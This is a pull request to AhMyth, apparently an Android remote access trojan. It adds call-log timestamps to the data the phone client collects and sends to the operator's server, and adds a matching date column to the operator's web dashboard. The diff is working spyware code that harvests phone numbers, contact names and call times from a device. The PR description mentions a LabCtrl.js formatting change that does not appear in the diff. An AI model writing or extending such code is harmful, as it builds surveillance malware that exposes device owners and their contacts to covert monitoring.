### PR TITLE
Add timestamp and date formatting to Call Logs

### DIFF
--- a/AhMyth-Client/app/src/main/java/ahmyth/mine/king/ahmyth/CallsManager.java
+++ b/AhMyth-Client/app/src/main/java/ahmyth/mine/king/ahmyth/CallsManager.java
@@ -10,6 +10,7 @@ import org.json.JSONObject;
 
 /**
  * Created by AhMyth on 11/11/16.
+ * Updated for Timestamp Support 2026
  */
 
 public class CallsManager {
@@ -23,21 +24,31 @@ public class CallsManager {
             Uri allCalls = Uri.parse("content://call_log/calls");
             Cursor cur = MainService.getContextOfApplication().getContentResolver().query(allCalls, null, null, null, null);
 
-            while (cur.moveToNext()) {
-                JSONObject call = new JSONObject();
-                String num = cur.getString(cur.getColumnIndex(CallLog.Calls.NUMBER));// for  number
-                String name = cur.getString(cur.getColumnIndex(CallLog.Calls.CACHED_NAME));// for name
-                String duration = cur.getString(cur.getColumnIndex(CallLog.Calls.DURATION));// for duration
-                int type = Integer.parseInt(cur.getString(cur.getColumnIndex(CallLog.Calls.TYPE)));// for call type, Incoming or out going.
+            if (cur != null) {
+                while (cur.moveToNext()) {
+                    JSONObject call = new JSONObject();
+                    
+                    String num = cur.getString(cur.getColumnIndex(CallLog.Calls.NUMBER));
+                    String name = cur.getString(cur.getColumnIndex(CallLog.Calls.CACHED_NAME));
+                    String duration = cur.getString(cur.getColumnIndex(CallLog.Calls.DURATION));
+                    int type = Integer.parseInt(cur.getString(cur.getColumnIndex(CallLog.Calls.TYPE)));
+                    
+                    // NEW: Extract the timestamp (milliseconds since 1970)
+                    long date = cur.getLong(cur.getColumnIndex(CallLog.Calls.DATE));
 
-
-                call.put("phoneNo", num);
-                call.put("name", name);
-                call.put("duration", duration);
-                call.put("type", type);
-                list.put(call);
-
+                    call.put("phoneNo", num);
+                    call.put("name", name);
+                    call.put("duration", duration);
+                    call.put("type", type);
+                    
+                    // NEW: Add the date to the JSON object
+                    call.put("date", date); 
+                    
+                    list.put(call);
+                }
+                cur.close(); // Good practice to close the cursor
             }
+            
             Calls.put("callsList", list);
             return Calls;
         } catch (JSONException e) {

--- a/AhMyth-Server/app/app/views/callsLogs.html
+++ b/AhMyth-Server/app/app/views/callsLogs.html
@@ -1,5 +1,5 @@
 <div class="ui {{load}} segment h100" style="overflow: scroll; height: 400px;" id="parent">
-    <table class="ui  very compact striped table full">
+    <table class="ui very compact striped table full">
         <thead>
             <tr>
                 <th colspan="2">
@@ -9,13 +9,20 @@
                     </div>
                 </th>
 
-                <th colspan="2">
+                <th colspan="3">
                     <div class="right aligned">
                         <a class="ui red label" ng-click="SaveCalls()">
                             <i class="save icon"></i> Save
                         </a>
                     </div>
                 </th>
+            </tr>
+            <tr>
+                <th>Number</th>
+                <th>Name</th>
+                <th>Duration (s)</th>
+                <th>Type</th>
+                <th>Date & Time</th>
             </tr>
         </thead>
         <tbody infinite-scroll="increaseLimit()" infinite-scroll-container='"#parent"'>
@@ -30,9 +37,8 @@
                     <span ng-if="call.type==1">INCOMING</span>
                     <span ng-if="call.type!=1">OUTGOING</span>
                 </td>
+                <td ng-bind="call.date"></td>
             </tr>
         </tbody>
     </table>
-
-
 </div>


### PR DESCRIPTION
This PR adds date and timestamp support to the Call Logs feature. Previously, the tool collected call metadata (Number, Name, Duration, Type) but lacked the specific time of the occurrence, making it difficult to track chronological events.
🚀 Changes

    Android Client (CallsManager.java): Modified the content resolver query to extract CallLog.Calls.DATE and include it in the JSON payload sent to the server.

    Server Controller (LabCtrl.js): Added logic to format the incoming Unix timestamp into a human-readable string (Local Date/Time).

    Web Dashboard (callsLogs.html): Updated the UI table to include a "Date & Time" column and bound it to the new data field.
<img width="701" height="747" alt="image" src="https://github.com/user-attachments/assets/c3bcb105-f1f1-4480-9727-b8fba260bf9e" />
